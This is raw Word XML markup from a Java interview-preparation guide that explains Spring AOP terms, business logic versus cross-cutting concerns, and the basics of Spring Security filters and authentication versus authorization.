    <w:p w14:paraId="5A88F3C1"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Spring, the aspect is applied to the target object using AOP proxies, and it acts as a modular component that encapsulates cross-cutting concerns (like logging, security, etc.).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52FC168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2BF9ADC3" w14:textId="77777777" w:rsidR="008F7FDE" w:rsidRPr="008045FC" w:rsidRDefault="008F7FDE" w:rsidP="008045FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1952"/>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logging aspect could contain </w:t>
      </w:r>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>befo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fter</w:t>
      </w:r>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> advices to log method execution details across all methods in the service layer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="248BCE7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227C365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123CBD2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LoggingAspect {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F3096EC"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461A9FD8"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0672FF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04C3B00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6243C4A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DCB7B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1A80373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3D386C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24E78BC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61E9AC80"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8BA3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40F7958"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AF2C98"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A point during the execution of a program, such as method execution, where an aspect can be applied.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B4E6E01"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The action taken at a join point (before, after, around, etc.).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ADEEB56"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A condition (expression) that defines which join points the advice should be applied to.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F72D50"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A module that combines advice and pointcuts to define cross-cutting concerns and how they should be applied to the target methods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="299245A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se concepts help modularize concerns that affect multiple parts of an application, such as logging, security, or transaction management, allowing cleaner and more maintainable code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6592B92C" w14:textId="77777777" w:rsidR="00CD6436" w:rsidRPr="00CE4B95"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95684A">
          <v:rect id="_x0000_i2139" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D6AFBD"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72" w:name="_Toc197867686"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the difference between cross-cutting concern and business logic?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="472"/>
    </w:p>
    <w:p w14:paraId="4E0C4C99" w14:textId="0D1B0D87" w:rsidR="002C40B5" w:rsidRPr="008045FC" w:rsidRDefault="002C40B5"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are two distinct aspects of application development that have different responsibilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E35FE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Business Logic:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E2DDFC"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Business logic refers to the core functionality of an application, which handles the specific operations that define the business rules or processes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B6AE7C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r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: It implements the actual logic that drives the application's value, such as calculations, data processing, validation, and any functionality directly related to the domain of the application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F4BD32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In an e-commerce application, the business logic would include things like processing orders, calculating the total price, applying discounts, or determining shipping costs based on the user’s location.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AF1639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Business Logic:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0986E743" w14:textId="77777777" w:rsidR="002C40B5" w:rsidRPr="008045FC" w:rsidRDefault="002C40B5" w:rsidP="008045FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1955"/>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n online banking system, the logic for transferring money between accounts is business logic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1762A06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transferMoney(Account fromAccount, Account toAccount, double amount) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DB13A1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if (fromAccount.getBalance() &gt;= amount) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="530E123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fromAccount.debit(amount);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DDDB8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oAccount.credit(amount);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E0DFF0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else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19FC74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hrow new InsufficientFundsException();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="052043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41C4DE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88BBE82"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Cross-Cutting Concerns:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6418657B"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Purpose</w:t>
      </w:r>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: They are not part of the core business functionality but are necessary to make the system work properly in terms of performance, security, logging, transactions, error handling, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F1A1907"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Logging, security (authentication and authorization), transaction management, caching, validation, monitoring, and exception handling are all cross-cutting concerns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="773ED7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Cross-Cutting Concern:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40CF6EDE" w14:textId="77777777" w:rsidR="002C40B5" w:rsidRPr="008045FC" w:rsidRDefault="002C40B5" w:rsidP="008045FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1957"/>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Logging the details of method calls for debugging purposes or tracking execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70DD13E3"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C50D2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MethodInvocation(JoinPoint joinPoint) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73999D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Executing method: " + joinPoint.getSignature());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="672A883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65B94C8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956"/>
        <w:gridCol w:w="4859"/>
      </w:tblGrid>
      <w:tr w:rsidR="008045FC" w:rsidRPr="008045FC" w14:paraId="371C8B3D" w14:textId="77777777" w:rsidTr="002C40B5">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="10B98BA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Aspect</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="392F000D"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usiness Logic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5B21B4A9"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Cross-Cutting Concerns</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008045FC" w:rsidRPr="008045FC" w14:paraId="7052B729" w14:textId="77777777" w:rsidTr="002C40B5">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5D1686D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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="443EC9B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re operations that represent the business rules</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="37CDE18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on-core functionality that impacts multiple parts of the app</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008045FC" w:rsidRPr="008045FC" w14:paraId="32EDBF1D" w14:textId="77777777" w:rsidTr="002C40B5">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="304991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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="114DEAE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implement domain-specific functionality and operations</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="75395138"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manage aspects like security, logging, transactions, etc.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008045FC" w:rsidRPr="008045FC" w14:paraId="2009116E" w14:textId="77777777" w:rsidTr="002C40B5">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="65C9996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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="020F8E9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rocessing orders, calculating totals, handling payments</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="29DD0B5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Logging, security, error handling, performance monitoring</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008045FC" w:rsidRPr="008045FC" w14:paraId="4264B661" w14:textId="77777777" w:rsidTr="002C40B5">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="16EE670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cope</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="52F2542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arrow, specific to business needs and domain</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="359223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road, affects multiple components or layers of the application</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008045FC" w:rsidRPr="008045FC" w14:paraId="49A690C0" w14:textId="77777777" w:rsidTr="002C40B5">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2CB575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Reusability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="485CA28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usiness logic is tightly coupled with the specific functionality of the application</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="24D2E4F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ross-cutting concerns can be reused across different business logic</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008045FC" w:rsidRPr="008045FC" w14:paraId="26EC8946" w14:textId="77777777" w:rsidTr="002C40B5">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="160BF8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hange Frequency</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="644396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based on evolving business requirements</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0FED8AA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are often related to application-wide concerns (e.g., adding logging, altering security policies)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5B5B182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Relationship:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50BA3BDA"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focuses on fulfilling the application’s primary objectives (what the application is designed to do), while </w:t>
      </w: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deal with aspects that improve the system’s operation but are not directly part of the core functionality (how the application works, like monitoring or security).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1396F011"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A7E0B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 shopping cart application:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07656D08"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Calculating the total amount of a shopping cart, applying discounts, checking out, and processing payment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5914927D"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w:t>
      </w:r>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Logging each action taken by the user, ensuring the transaction is recorded, and managing security by checking whether the user is logged in before making a purchase.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0544A34D" w14:textId="77777777" w:rsidR="002C40B5" w:rsidRPr="00CE4B95" w:rsidRDefault="002C40B5" w:rsidP="008045FC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>By separating cross-cutting concerns from business logic, the code becomes cleaner, more maintainable, and easier to extend without cluttering the core business processes with auxiliary functionalities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="155582DF"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40" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A56017B" w14:textId="77777777" w:rsidR="00894AF5" w:rsidRPr="00CE4B95" w:rsidRDefault="00894AF5">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4CBCC721" w14:textId="7E890A1D" w:rsidR="00894AF5" w:rsidRPr="00CE4B95" w:rsidRDefault="00894AF5" w:rsidP="00894AF5">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="473" w:name="_Toc197867687"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Spring Security</w:t>
      </w:r>
      <w:bookmarkEnd w:id="473"/>
    </w:p>
    <w:p w14:paraId="4BDF3338" w14:textId="77777777" w:rsidR="00894AF5" w:rsidRPr="00CE4B95" w:rsidRDefault="00894AF5" w:rsidP="00D0720A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="095524FF" w14:textId="39EFFC60" w:rsidR="00CA332E" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA332E" w:rsidP="00CA332E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="474" w:name="_Toc197867688"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is Spring Security?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="474"/>
    </w:p>
    <w:p w14:paraId="1ABC434F" w14:textId="2AA74B7D" w:rsidR="005A6F56" w:rsidRPr="00CE4B95" w:rsidRDefault="005A6F56" w:rsidP="007934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Security is a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>powerful and customizable authentication and access control framework</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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Authorization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E406D6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RF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5312B8CF"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Fixation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="109DF6C6"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jacking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E183BB1" w14:textId="217B41F4"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RL access restrictions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FEAE142" w14:textId="2C35165A" w:rsidR="002D20EE" w:rsidRPr="00CE4B95"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41" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F3681AA" w14:textId="5B5CBA80" w:rsidR="00CA332E" w:rsidRPr="00CE4B95" w:rsidRDefault="00724410" w:rsidP="00CA332E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="475" w:name="_Toc197867689"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How does Spring Security work internally</w:t>
      </w:r>
      <w:r w:rsidR="00CA332E" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="475"/>
    </w:p>
    <w:p w14:paraId="77E65086" w14:textId="6B2A1C2A" w:rsidR="00CA332E" w:rsidRPr="00CE4B95"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chain of filters</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (FilterChainProxy) to intercept HTTP requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D79CE9" w14:textId="278CB404"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lters include:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A5BB59F"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AuthenticationFilter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4532E993"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icAuthenticationFilter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ADBCD59"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ContextPersistenceFilter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A2082F" w14:textId="429F92B6"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TranslationFilter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C3A92EE"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handled by AuthenticationManager.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B82CDD4" w14:textId="04124701"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pon success, an Authentication object is stored in the SecurityContext.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38B16AA6" w14:textId="675599FD" w:rsidR="00CA332E" w:rsidRPr="00CE4B95"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42" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ECCF628" w14:textId="22BBE92A" w:rsidR="00894AF5" w:rsidRPr="00CE4B95" w:rsidRDefault="00495BC9" w:rsidP="00894AF5">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="476" w:name="_Toc197867690"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">Difference between Authentication </w:t>
      </w:r>
      <w:r w:rsidR="00F123A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Authorization</w:t>
      </w:r>
      <w:r w:rsidR="00894AF5" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="476"/>
    </w:p>
    <w:p w14:paraId="080C39D2" w14:textId="56B80E56" w:rsidR="00894AF5" w:rsidRPr="00CE4B95"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4159"/>
        <w:gridCol w:w="3518"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E05B58" w:rsidRPr="00CE4B95" w14:paraId="7CA8002A" w14:textId="77777777" w:rsidTr="00E05B58">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4D15C599"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574A513A"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entication</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="591B0552"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orization</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E05B58" w:rsidRPr="00CE4B95" w14:paraId="72415BF6" w14:textId="77777777" w:rsidTr="00E05B58">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="541B423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ition</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="34C92F72"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ifying who the user is</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="252E09F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ing what the user can access</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E05B58" w:rsidRPr="00CE4B95" w14:paraId="3CEEB28B" w14:textId="77777777" w:rsidTr="00E05B58">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5071E9A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3D1D53C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in with username &amp; password</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2922F3C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ing if the user can access /admin</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E05B58" w:rsidRPr="00CE4B95" w14:paraId="56E64B61" w14:textId="77777777" w:rsidTr="00E05B58">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2C44608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estion Answered</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5636FED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Are you the right user?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="16DA7C7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Do you have permission?</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E05B58" w:rsidRPr="00CE4B95" w14:paraId="797A9713" w14:textId="77777777" w:rsidTr="00E05B58">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5BE6BA2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t Happens</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3D7F616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uthorization</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5AC9597A"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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
